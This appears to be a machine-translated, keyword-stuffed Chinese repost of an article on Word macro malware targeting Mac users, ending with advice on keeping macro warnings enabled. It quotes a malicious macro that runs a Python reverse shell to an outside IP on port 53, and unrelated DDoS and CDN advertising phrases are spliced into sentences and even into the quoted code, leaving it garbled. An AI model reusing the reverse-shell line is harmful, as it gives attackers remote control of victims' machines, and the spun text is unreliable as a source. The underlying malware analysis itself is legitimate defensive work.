来自 资讯 2021-04-05 06:35 的文章

高防http_好用的_服务器经常被攻击怎么办

高防http_好用的_服务器经常被攻击怎么办

宏恶意软件-通常称为"Word宏病毒"-涉及恶意编制的包含Visual Basic宏的Microsoft Office文档。这些东西已经存在了很长一段时间了,但大多只是对Mac用户造成了麻烦。不幸的是,这种情况现在已经改变了。从历史上看,1g带宽防御ddos,Microsoft Office for Mac在2004年之前一直支持宏,因此容易受到宏恶意软件的攻击。然而,这类恶意软件主要针对Windows用户,而对于Mac用户来说,除了潜在地感染他们的"正常"模板(所有空白的新文档都是从该模板创建的)之外,大多数情况下对Mac用户几乎没有任何作用。这将导致在该计算机上创建的未来文档被宏恶意软件感染,然后这些恶意软件可能会传递给其他人。然后微软发布了OfficeforMac2008,取消了对宏的支持。这让许多长期使用officeformac的专业用户感到不安,他们使用宏。然而,nginx配置cc防御,这是一个安全意识强的Mac用户所庆祝的举动,因为它使Mac机免受宏恶意软件的攻击。2011年,新版officeformac又迎来了macro。幸运的是,它还带来了一个设置,在打开包含宏的文档时警告用户。此设置在默认情况下处于启用状态,这在很大程度上防止了Mac上新出现的宏恶意软件,同时也允许喜欢宏的Mac用户从Office for Mac 2004升级。宏恶意软件已经远离大多数Mac用户的视线一段时间了。即使作为一个安全专家,我现在也很少遇到这样的恶意软件。然而,最近,当发现一个针对Mac用户的恶意Word文档时,一切都发生了变化。著名的Mac安全专家Patrick Wardle对恶意软件进行了出色的分析。我不能改进他所说的,但本质上,恶意软件会首先检查是否存在Little Snitch,一种著名的Mac外挂防火墙。如果有小飞贼在场,它就会跳出去。否则,它将下载并安装第二阶段组件(不再可用),并通过几种特定于Mac的持久性方法之一将其设置为持续运行。另一个宏恶意软件的例子是在不久之后发现的,高防cdn推荐,它试图通过反向shell连接到恶意服务器,首先是在Windows上,但如果失败,则尝试使用Mac代码:函数macshell()出错时继续下一步呃。清除scriptToRun="do shell script""python-c"导入urllib2,套接字,子进程,操作系统=插座.插座(插座,流式插座);s.connect(("192.241.191.104\",cdn高防ip,53));操作系统2(s.fileno(),0);操作系统2(s.fileno(),1);操作系统2(s.fileno(),2);p=subprocess.call([\""/bin/sh\"",\""-i\""]);'&"""res=MacScript(scriptToRun)结束函数(SHA256:40c414fd75de6def664b3e953313125fc5e05628b6a2e07ded7634dc4f884666)这就引出了Mac用户如何保护自己免受这种威胁的问题。幸运的是,这并不难。首先,在打开来自不可靠来源的任何Office文档(例如来自陌生人或不熟悉网站的电子邮件)之前,应谨慎行事。如果确实需要打开文档,默认情况下应打开前面提到的"打开包含宏的文件之前发出警告"设置。不过,明智的做法是验证这一点,方法是转到Word、Excel和PowerPoint的首选项中的"安全和隐私"设置,如果还没有,则将其打开。启用此设置后,尝试打开包含宏的文档将显示警告。默认设置是在禁用宏的情况下打开文档,这样可以防止恶意软件触发。如果您对文档的合法性有任何疑问,或者如果您无缘无故地知道它应该包含任何宏,则不应单击"启用宏"按钮!如果你很注意并且没有禁用你的Office应用程序保护你的能力,这种恶意软件很难或不可能感染你。然而,自建高防cdn实现故障,总有一些人会成为这些假文档所使用的社会工程的牺牲品,他们会在启用宏的情况下重新打开它们。不要成为那些人中的一员,把这些信息传递给那些你认识的可能被愚弄的人。